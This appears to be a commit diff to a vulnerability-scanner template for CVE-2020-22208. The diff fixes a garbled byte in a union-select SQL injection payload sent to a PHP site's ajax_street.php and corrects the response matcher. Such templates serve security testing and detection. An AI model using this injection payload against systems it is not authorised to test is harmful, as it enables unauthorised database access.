Update CVE-2020-22208.yaml
parent
f79c2d50f2
commit
1a54b625b8
|
@ -23,10 +23,10 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<EFBFBD>' union select%201,2,3,md5({{randstr}}),5,6,7,8,9%23"
|
||||
- "{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11' union select%201,2,3,md5({{randstr}}),5,6,7,8,9%23"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "md5({{randstr}})"
|
||||
- '{{md5("{{randstr}}")}}'
|
||||
|
|
Loading…
Reference in New Issue